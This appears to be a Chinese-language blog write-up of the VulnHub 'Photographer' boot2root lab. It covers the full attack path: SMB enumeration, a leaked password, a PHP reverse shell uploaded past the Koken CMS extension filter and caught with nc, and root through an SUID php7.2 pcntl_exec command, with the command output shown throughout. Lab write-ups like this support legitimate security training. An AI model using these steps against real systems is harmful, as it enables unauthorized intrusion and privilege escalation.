Lluna's Pure land.

What is life like when singing to wine?

0%

Photographer

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 10k 阅读时长 ≈ 9 分钟

0x00.官网描述

This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.

0x01.信息收集,上nmap

可以发现可以发现1为网关,254为物理机,129为kali,那么135就是目标

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@JIYE:~/vulnhub/photographer# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-18 06:13 EST
Nmap scan report for 192.168.1.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.1.135
Host is up (0.00018s latency).
MAC Address: 00:0C:29:2D:43:1A (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00017s latency).
MAC Address: 00:50:56:EB:EE:5F (VMware)
Nmap scan report for 192.168.1.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.96 seconds
root@JIYE:~/vulnhub/photographer#

0x02.扫描端口

可以看到开放了80、139、8000、445(SMB)等敏感端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
root@JIYE:~/vulnhub/photographer# nmap -sC -sV -sT 192.168.1.135 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-18 06:23 EST
Nmap scan report for 192.168.1.135
Host is up (0.0010s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  ssl/http-alt Apache/2.4.18 (Ubuntu)
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
MAC Address: 00:0C:29:2D:43:1A (VMware)
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 9h40m00s, deviation: 2h53m12s, median: 7h59m59s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2020-12-18T14:23:58-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-18T19:23:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.84 seconds
root@JIYE:~/vulnhub/photographer#

0x03.访问80端口

手动爬虫,是一个静态界面,没有什么发现

0x04.访问8000端口

手动爬虫,发现CMS为Koken,并且发现一个shell.php不知道肝肾的。

查看源码,发现CMS版本为0.22.24

0x05.Google exploit

找到一个文件上传,emmmmmm.刚才爬虫的页面没有上传点,所以猜测需要登入到后台进行上传。

0x06.访问admin目录(🙃竟然成功了)

这里其实需要扫一下目录,但是猜到了admin,就不赘述了🌚。

尝试弱口令登入,可以看到用户名需要是一个邮箱,但不是知道格式,故无法进行爆破。

0x07.审查445端口

前面发现了开放了445端口,所以使用enum4linux开始探索一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
root@JIYE:~# enum4linux -a -o 192.168.1.135
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec 18 06:45:16 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.135
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.135    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.1.135    |
 ============================================= 
Looking up status of 192.168.1.135
        PHOTOGRAPHER    <00> -         B <ACTIVE>  Workstation Service
        PHOTOGRAPHER    <03> -         B <ACTIVE>  Messenger Service
        PHOTOGRAPHER    <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.1.135    |
 ====================================== 
[+] Server 192.168.1.135 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.135    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.1.135    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.135 from smbclient: 
[+] Got OS info for 192.168.1.135 from srvinfo:
        PHOTOGRAPHER   Wk Sv PrQ Unx NT SNT photographer server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 192.168.1.135    |
 ============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================== 
|    Share Enumeration on 192.168.1.135    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      Samba on Ubuntu
        IPC$            IPC       IPC Service (photographer server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.1.135
//192.168.1.135/print$  Mapping: DENIED, Listing: N/A
//192.168.1.135/sambashare      Mapping: OK, Listing: OK
//192.168.1.135/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.1.135    |
 ===================================================== 


..........(省略部分无关紧要的内容)

 ============================================== 
|    Getting printer info for 192.168.1.135    |
 ============================================== 
No printers returned.


enum4linux complete on Fri Dec 18 06:45:30 2020

root@JIYE:~#

可以发现samba服务的一个目录sambashare

//192.168.1.135/sambashare Mapping: OK, Listing: OK

匿名直接连接进行查看,发现一个wordpress站点的备份文件和一个txt文件

根据文件名mailsent.txt文件是一封发送的邮件,内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

可以看到邮箱为daisa@photographer.com

还有邮件内容为你的网站现在准备好了,不要忘记你的密码my babygirl

这里推测密码为babygirl,所以尝试登入,OK推测正确

0x08.上传文件,反弹shell

本次使用kali自带reverse shell路径(/usr/share/webshells/php/php-reverse-shell.php)

将IP修改为kali本身,端口为6666

上传

结果仅仅可以上传JPG、PNG、GIF、MP4格式文件,所以先修改文件后缀

进行上传

抓包将后缀改回php

kali监听

1
2
3
4
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...


点击反弹shell

成功get shell

1
2
3
4
5
6
7
8
9
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.129] from (UNKNOWN) [192.168.1.135] 56236
Linux photographer 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 15:33:07 up  1:44,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

0x09.提权

首先升级shell

1
2
3
4
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/$ 

www-data@photographer:/$

升级交互shell

1
2
3
4
5
6
7
8
9
10
11
12
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/$ 

www-data@photographer:/$ ^Z
[1]+  已停止               nc -nvlp 6666
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 6666

www-data@photographer:/$ 
www-data@photographer:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@photographer:/$

在daisa找到user.txt的flag

1
2
3
www-data@photographer:/home/daisa$ cat user.txt 
d41d8cd98f00b204e9800998ecf8427e
www-data@photographer:/home/daisa$

suid提权

1
2
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 2>/dev/null

可以发现php7.2可以利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
www-data@photographer:/home/daisa$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
www-data@photographer:/home/daisa$

提权参考

找到php7.2命令的目录,在/usr/bin/php7.2

1
2
3
www-data@photographer:/$ whereis php7.2
php7: /usr/bin/php7.2 /usr/share/php7.2-mysql /usr/share/php7.2-opcache /usr/share/php7.2-xmlrpc /usr/share/php7.2-json /usr/share/php7.2-readline /usr/share/php7.2-curl /usr/share/php7.2-common /usr/share/php7.2-sqlite3 /usr/share/php7.2-zip /usr/share/php7.2-intl /usr/share/php7.2-xml /usr/share/php7.2-gd /usr/share/php7.2-mbstring
www-data@photographer:/$

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
www-data@photographer:/usr/bin$ ./php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
# # id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
root
# pwd
/usr/bin
# cd /
# cd ~  
/bin/sh: 5: cd: can't cd to ~
# cd /root
# ls
proof.txt
# cat proof.txt
                                                                   
                                .:/://::::///:-`                                
                            -/++:+`:--:o:  oo.-/+/:`                            
                         -++-.`o++s-y:/s: `sh:hy`:-/+:`                         
                       :o:``oyo/o`. `      ```/-so:+--+/`                       
                     -o:-`yh//.                 `./ys/-.o/                      
                    ++.-ys/:/y-                  /s-:/+/:/o`                    
                   o/ :yo-:hNN                   .MNs./+o--s`                   
                  ++ soh-/mMMN--.`            `.-/MMMd-o:+ -s                   
                 .y  /++:NMMMy-.``            ``-:hMMMmoss: +/                  
                 s-     hMMMN` shyo+:.    -/+syd+ :MMMMo     h                  
                 h     `MMMMMy./MMMMMd:  +mMMMMN--dMMMMd     s.                 
                 y     `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm     +-                 
                 h      dMMMMd:````  `mmNh   ```./NMMMMs     o.                 
                 y.     /MMMMNmmmmd/ `s-:o  sdmmmmMMMMN.     h`                 
                 :o      sMMMMMMMMs.        -hMMMMMMMM/     :o                  
                  s:     `sMMMMMMMo - . `. . hMMMMMMN+     `y`                  
                  `s-      +mMMMMMNhd+h/+h+dhMMMMMMd:     `s-                   
                   `s:    --.sNMMMMMMMMMMMMMMMMMMmo/.    -s.                    
                     /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`                     
                      .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-                       
                        ./+:`:yh:dso/.+-++++ss+h++.:++-                         
                           -/+/-:-/y+/d:yh-o:+--/+/:`                           
                              `-///////////////:`                               
                                                                                

Follow me at: http://v1n1v131r4.com
d41d8cd98f00b204e9800998ecf8427e
#
-------------纸短情长下次再见-------------